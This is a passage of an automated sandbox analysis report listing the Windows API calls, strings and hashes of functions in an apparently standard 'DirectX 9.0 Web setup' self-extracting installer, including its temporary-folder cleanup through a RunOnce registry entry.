                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fac211542a3869dc8880f68233b4de0dfb7fb2ced29cb3492eb621ecda2867df
                                                                                                • Instruction ID: 8b19583f7cc30d59397d6f805d7a34eb48c67b28d2acfd70727ba9726ee87818
                                                                                                • Opcode Fuzzy Hash: fac211542a3869dc8880f68233b4de0dfb7fb2ced29cb3492eb621ecda2867df
                                                                                                • Instruction Fuzzy Hash: 4961C231A105598BEF2ADE6CC4504AD7BE2FFC9380F28852EEDD2C7295DA30D856C740
                                                                                                Function 010030A7 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 351stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CharNextA.USER32(00000000,00000001,DirectX 9.0 Web setup,00000000), ref: 010030FC
                                                                                                • GetModuleFileNameA.KERNEL32(0100B99E,00000104,00000001,DirectX 9.0 Web setup,00000000), ref: 010031AB
                                                                                                • CharUpperA.USER32(?), ref: 010031F2
                                                                                                • CharUpperA.USER32(-0000004F), ref: 0100327E
                                                                                                • lstrcmpiA.KERNEL32(RegServer,?), ref: 010032FB
                                                                                                • CharUpperA.USER32(?), ref: 0100332C
                                                                                                • CharUpperA.USER32(-0000004E), ref: 01003390
                                                                                                • lstrlenA.KERNEL32(0000002F), ref: 010033F4
                                                                                                • CharUpperA.USER32(?,0000002F,00000000), ref: 0100341F
                                                                                                • lstrcpyA.KERNEL32(0100B89A,0000002F), ref: 01003445
                                                                                                • lstrlenA.KERNEL32(0000002F), ref: 010034A7
                                                                                                • lstrcpyA.KERNEL32(0100BAA2,0000002F,0000002F,00000000,0000002F,0000005D,0000002F,0000005B), ref: 01003510
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 01003527
                                                                                                • ExitProcess.KERNEL32 ref: 0100352F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Upper$lstrcpylstrlen$CloseExitFileHandleModuleNameNextProcesslstrcmpi
                                                                                                • String ID: "$-$:$DirectX 9.0 Web setup$RegServer
                                                                                                • API String ID: 497476604-3032641433
                                                                                                • Opcode ID: 371de19490df7cb82253388f7ccfcefcc3d42cf60ba8daf27433a3a64da543f6
                                                                                                • Instruction ID: dd2cde4f62ecb0696e2bc8a39cc73c6255fd3d926b1c092d9355c5c2792a8576
                                                                                                • Opcode Fuzzy Hash: 371de19490df7cb82253388f7ccfcefcc3d42cf60ba8daf27433a3a64da543f6
                                                                                                • Instruction Fuzzy Hash: 74C1E075908694AEFB738B2C88493FA7FE4BB12341F4840D6E6C19E1D5CBB88685CB51
                                                                                                Function 010038CC Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 138stringmemorywindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01002AA6: LoadStringA.USER32(?,00000200,?,LoadString() Error. Could not load string resource.), ref: 01002AC1
                                                                                                • MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                • lstrlenA.KERNEL32(0000007F,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 01003963
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0100396A
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01003975
                                                                                                • LocalAlloc.KERNEL32(00000040,00000064), ref: 0100397E
                                                                                                • wsprintfA.USER32 ref: 01003998
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 010039B2
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 010039BD
                                                                                                • LocalAlloc.KERNEL32(00000040,00000064), ref: 010039C6
                                                                                                • wsprintfA.USER32 ref: 010039E1
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 010039F3
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 010039FD
                                                                                                • lstrcpyA.KERNEL32(00000000,00000000), ref: 01003A15
                                                                                                • MessageBeep.USER32(?), ref: 01003A1E
                                                                                                • MessageBoxA.USER32(00000000,00000000,DirectX 9.0 Web setup,00000000), ref: 01003A5E
                                                                                                • LocalFree.KERNEL32(00000000), ref: 01003A67
                                                                                                  • Part of subcall function 01005D22: GetVersionExA.KERNEL32(?), ref: 01005D57
                                                                                                  • Part of subcall function 01005D22: GetSystemMetrics.USER32(0000004A), ref: 01005D85
                                                                                                  • Part of subcall function 01005D22: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 01005DA4
                                                                                                  • Part of subcall function 01005D22: RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?,?), ref: 01005DC5
                                                                                                  • Part of subcall function 01005D22: RegCloseKey.ADVAPI32(?), ref: 01005DD0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$Local$AllocMessage$wsprintf$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersionlstrcpy
                                                                                                • String ID: DirectX 9.0 Web setup$LoadString() Error. Could not load string resource.
                                                                                                • API String ID: 374963636-2857572701
                                                                                                • Opcode ID: 29eaf20adb8414ecd2b4ec2a36024fe3784d745325a63702e793e7b321412cb4
                                                                                                • Instruction ID: 9f594f166ace6732594a8fb8e6c25f38449a5eba683ea2e31a4322fc80030977
                                                                                                • Opcode Fuzzy Hash: 29eaf20adb8414ecd2b4ec2a36024fe3784d745325a63702e793e7b321412cb4
                                                                                                • Instruction Fuzzy Hash: A6416631500259AFFB63AB64DC49FEA3AA8FF04350F040551FDC1DA195DBB5CA94CBA0
                                                                                                Function 01004E56 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 183windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadStringA.USER32(000003E8,0100A640,00000200), ref: 01004EAF
                                                                                                • GetDesktopWindow.USER32 ref: 01005009
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 0100501F
                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01005038
                                                                                                • GetDlgItem.USER32(?,00000836), ref: 01005051
                                                                                                • EnableWindow.USER32(00000000), ref: 01005058
                                                                                                • EndDialog.USER32(?,00000000), ref: 01005065
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DirectX 9.0 Web setup
                                                                                                • API String ID: 2418873061-3197627661
                                                                                                • Opcode ID: 631fb0b2ebf77da2618df05cbc4a49d4bbcce4c3538e6841af407c24bcd3fbff
                                                                                                • Instruction ID: 5d03767cd6d44e1ff7b95dfa45677d46a9542d139ef34e3ffbaad0eb8858980f
                                                                                                • Opcode Fuzzy Hash: 631fb0b2ebf77da2618df05cbc4a49d4bbcce4c3538e6841af407c24bcd3fbff
                                                                                                • Instruction Fuzzy Hash: EF519070241745BAF6735B668C4CFAF2EACEB86B45F004018B7C5EA0C5DAB9C611C7B8
                                                                                                Function 01005075 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 126threadwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(00000000), ref: 010050B2
                                                                                                • EndDialog.USER32(?,?), ref: 010050BE
                                                                                                • ResetEvent.KERNEL32 ref: 010050DF
                                                                                                • SetEvent.KERNEL32(000004B2,01001251,00000000,00000020,00000004), ref: 0100510F
                                                                                                • GetDesktopWindow.USER32 ref: 01005146
                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 01005176
                                                                                                • SendMessageA.USER32(00000000,?,?,00000000), ref: 0100517F
                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 01005191
                                                                                                • SendMessageA.USER32(00000000,?,?,00000000), ref: 01005194
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 010051A2
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000049DB,00000000,00000000,0100AA48), ref: 010051B6
                                                                                                • EndDialog.USER32(?,00000000), ref: 010051D7
                                                                                                • EndDialog.USER32(?,00000000), ref: 010051FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Dialog$EventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2636921890-3102400635
                                                                                                • Opcode ID: 2e5909da755b8dd92093ec91b293cd0599467003ecf1b2f192f568b12a924e3b
                                                                                                • Instruction ID: 23f09e72cf5f3eaed0e006cdafc8c359d8237540093a3079cf3abfc6ea3c4f62
                                                                                                • Opcode Fuzzy Hash: 2e5909da755b8dd92093ec91b293cd0599467003ecf1b2f192f568b12a924e3b
                                                                                                • Instruction Fuzzy Hash: 0A415F31641225FBFB331B689C49EAA3EA8EB46B50F004011F6C5A64D9C77A9951CFD4
                                                                                                Function 010046D4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 109libraryloaderstringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,0100A640,0100A338,?), ref: 010046E2
                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 01004703
                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 01004716
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 01004729
                                                                                                • GetTempPathA.KERNEL32(00000104,0100AA80), ref: 01004749
                                                                                                • lstrlenA.KERNEL32(0100AA80), ref: 01004750
                                                                                                • CharPrevA.USER32(0100AA80,00000000), ref: 01004760
                                                                                                • CharPrevA.USER32(0100AA80,00000000), ref: 0100476C
                                                                                                • lstrcpyA.KERNEL32(?,0100AA80), ref: 010047BD
                                                                                                • FreeLibrary.KERNEL32(?), ref: 010047CC
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 010047DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemplstrcpylstrlen
                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                • API String ID: 2439948570-1731843650
                                                                                                • Opcode ID: 3324b512f0aa79aaecc928bbb591f72aff6d5178d9e94c9ee451a4be34d2a9a1
                                                                                                • Instruction ID: 193eb6bc1a1b02d365b45401d2cfe27bf2cb542b23eb453a0d77d81c3b9a3dce
                                                                                                • Opcode Fuzzy Hash: 3324b512f0aa79aaecc928bbb591f72aff6d5178d9e94c9ee451a4be34d2a9a1
                                                                                                • Instruction Fuzzy Hash: 3F315EB1A01258BFEB139F69CC88DAE7FB8BF0A340F554069F688E6180C7758945CB65
                                                                                                Function 01002081 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101registrystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CharUpperA.USER32(?,00000001,?,00000000), ref: 010020A8
                                                                                                • CharNextA.USER32(?), ref: 010020B7
                                                                                                • CharNextA.USER32(00000000), ref: 010020BA
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,00000000), ref: 01002110
                                                                                                • RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?), ref: 01002133
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0100214E
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 01002162
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01002176
                                                                                                • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010020EA
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,?), ref: 01002184
                                                                                                • GetSystemDirectoryA.KERNEL32(?,?), ref: 01002198
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010020D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$lstrcpy$DirectoryNext$CloseEnvironmentExpandOpenPrevQueryStringsSystemUpperValueWindowslstrlen
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                • API String ID: 347548745-2428544900
                                                                                                • Opcode ID: a6771fd5372bea0d88a9c6ef6506abc8c0f7b881c05286ce2042d5bdc15aa5be
                                                                                                • Instruction ID: d6a3e7514927295ec277a6c60e19e56b03ab3a9e12423da05e88d21a123d547c
                                                                                                • Opcode Fuzzy Hash: a6771fd5372bea0d88a9c6ef6506abc8c0f7b881c05286ce2042d5bdc15aa5be
                                                                                                • Instruction Fuzzy Hash: E0314A79900248BFEF228F64CC48FEE7BBDAF15350F008095FA84A6090D7B5DA958F90
                                                                                                Function 01001B8B Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 75registrystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000000), ref: 01001BB7
                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,00000000,771AF530), ref: 01001BE3
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 01001C12
                                                                                                • wsprintfA.USER32 ref: 01001C46
                                                                                                • lstrlenA.KERNEL32(?), ref: 01001C56
                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,00000001), ref: 01001C6C
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01001C75
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Valuelstrlen$CharCloseDirectoryOpenPrevQuerySystemlstrcpywsprintf
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                • API String ID: 11565330-4285006626
                                                                                                • Opcode ID: 5599e54c7d9c30600de5d0d1969bc1e94db08515ae13c163f555adafc5244e2b
                                                                                                • Instruction ID: 2fb7fcdbff80cae6b570ff950ba8ccadd0e573114065fe0f363dccfd66d38777
                                                                                                • Opcode Fuzzy Hash: 5599e54c7d9c30600de5d0d1969bc1e94db08515ae13c163f555adafc5244e2b
                                                                                                • Instruction Fuzzy Hash: 25215375A4021CBBEB22DBA5DD49FDABB7CEB08740F0000A5F689E6081D7B5DB448F60
                                                                                                Function 01003566 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 76stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 0100358A
                                                                                                • FindResourceA.KERNEL32(00000000,?,0000000A), ref: 01003596
                                                                                                • LoadResource.KERNEL32(00000000,00000000,00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035AB
                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035B2
                                                                                                • lstrlenA.KERNEL32(00000008,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035CD
                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035E7
                                                                                                • wsprintfA.USER32 ref: 010035FC
                                                                                                • FindResourceA.KERNEL32(00000000,?,0000000A), ref: 01003609
                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 01003628
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindFreewsprintf$LoadLocklstrlen
                                                                                                • String ID: UPDFILE%lu
                                                                                                • API String ID: 3821519360-2329316264
                                                                                                • Opcode ID: cefe3b29808c0de11ca19ee608c6f983850b7a9791d33d4cc506cee2b882d878
                                                                                                • Instruction ID: 67bd43b507032c87e08e44f5702343a162528d16cb23afe419e5d1f44a4bfc8c
                                                                                                • Opcode Fuzzy Hash: cefe3b29808c0de11ca19ee608c6f983850b7a9791d33d4cc506cee2b882d878
                                                                                                • Instruction Fuzzy Hash: C8215171A00209AFDB12DFD5DC88AEEBBF8FB48701F108055F585E6144D776D6008B61
                                                                                                Function 010021FB Relevance: 16.6, APIs: 11, Instructions: 90stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000104,00000104,00000000,771A83C0), ref: 01002235
                                                                                                • IsDBCSLeadByte.KERNEL32(00000000,?,771AE800), ref: 01002256
                                                                                                • CharNextA.USER32(?,?,771AE800), ref: 01002270
                                                                                                • CharUpperA.USER32(00000000,?,771AE800), ref: 01002278
                                                                                                • lstrlenA.KERNEL32(?,?,?,771AE800), ref: 01002291
                                                                                                • CharPrevA.USER32(?,?,?,771AE800), ref: 0100229D
                                                                                                • CharUpperA.USER32(00000000,?,771AE800), ref: 010022B5
                                                                                                • lstrcpyA.KERNEL32(?,?,?,771AE800), ref: 010022C5
                                                                                                • lstrlenA.KERNEL32(?,?,771AE800), ref: 010022D0
                                                                                                • CharNextA.USER32(?,?,771AE800), ref: 010022DC
                                                                                                • CharNextA.USER32(?,?,771AE800), ref: 010022E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Upperlstrlen$ByteFileLeadModuleNamePrevlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2740425872-0
                                                                                                • Opcode ID: 6f55dd0f941396175fb476c6ce2b428a4e45a6200b6cc63fadfff151ab2f4b34
                                                                                                • Instruction ID: c065ed5666d739eb8cb46574119231d274ae865d8c51cf87fce0dafe64722b0d
                                                                                                • Opcode Fuzzy Hash: 6f55dd0f941396175fb476c6ce2b428a4e45a6200b6cc63fadfff151ab2f4b34
                                                                                                • Instruction Fuzzy Hash: B631B1714083816FE773DFB88848BAABBEC6F4A700F58489AE5D0D3182D779D445CB66
                                                                                                Function 01003773 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,00000000), ref: 010037A8
                                                                                                • GetDesktopWindow.USER32 ref: 010037B8
                                                                                                • SetDlgItemTextA.USER32(?,00000834,?), ref: 010037D5
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 010037E1
                                                                                                • SetForegroundWindow.USER32(?), ref: 010037E8
                                                                                                • GetDlgItem.USER32(?,00000834), ref: 010037F5
                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 01003822
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemWindow$Text$DesktopDialogForegroundMessageSend
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 3995847246-3102400635
                                                                                                • Opcode ID: 0416d64abb4ccf835619947f66294db8555aab5d7019f45f1413da29fbb76d96
                                                                                                • Instruction ID: 01c3b69a9c1d9b51098dd75da9e10fd26e27e0a568cfd527d8e7b98c3a4c5e06
                                                                                                • Opcode Fuzzy Hash: 0416d64abb4ccf835619947f66294db8555aab5d7019f45f1413da29fbb76d96
                                                                                                • Instruction Fuzzy Hash: DB116A35144305AFFB735F68DC4CBAA3AA4FB4AB61F000165F5D9991C4C7BA8281D791
                                                                                                Function 010015F6 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58librarymemoryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000000,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100161A
                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0100162E
                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,DirectX 9.0 Web setup,?,?,010016C1), ref: 0100165E
                                                                                                • FreeSid.ADVAPI32(00000000,?,?,010016C1), ref: 01001672
                                                                                                • FreeLibrary.KERNEL32(010016C1,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100167C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                • String ID: CheckTokenMembership$DirectX 9.0 Web setup$advapi32.dll
                                                                                                • API String ID: 4204503880-3291049768
                                                                                                • Opcode ID: 05aef74ab9c6aad8ac387d91b692b6fb9c51c55194fb5577f0a734ca75a63f4d
                                                                                                • Instruction ID: 7c54915b23e232019903c0576df7497f5bb26148f144bc74401e3466b5a6cae1
                                                                                                • Opcode Fuzzy Hash: 05aef74ab9c6aad8ac387d91b692b6fb9c51c55194fb5577f0a734ca75a63f4d
                                                                                                • Instruction Fuzzy Hash: 87117071944289FBDB12DFA99C48ADEBFB8EF18344F540099F181A3181C6758A04CB65
                                                                                                Function 01002EAF Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetFileAttributesA.KERNEL32(004910B0,00000080,?,?,00000000), ref: 01002EE4
                                                                                                • DeleteFileA.KERNEL32(004910B0,?,?,00000000), ref: 01002EEC
                                                                                                • LocalFree.KERNEL32(004910B0,?,?,00000000), ref: 01002EF7
                                                                                                • LocalFree.KERNEL32(004910B0,?,?,00000000), ref: 01002EFA
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01002F25
                                                                                                • SetCurrentDirectoryA.KERNEL32(01001284,?,00000000), ref: 01002F43
                                                                                                Strings
                                                                                                • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 01002F1B
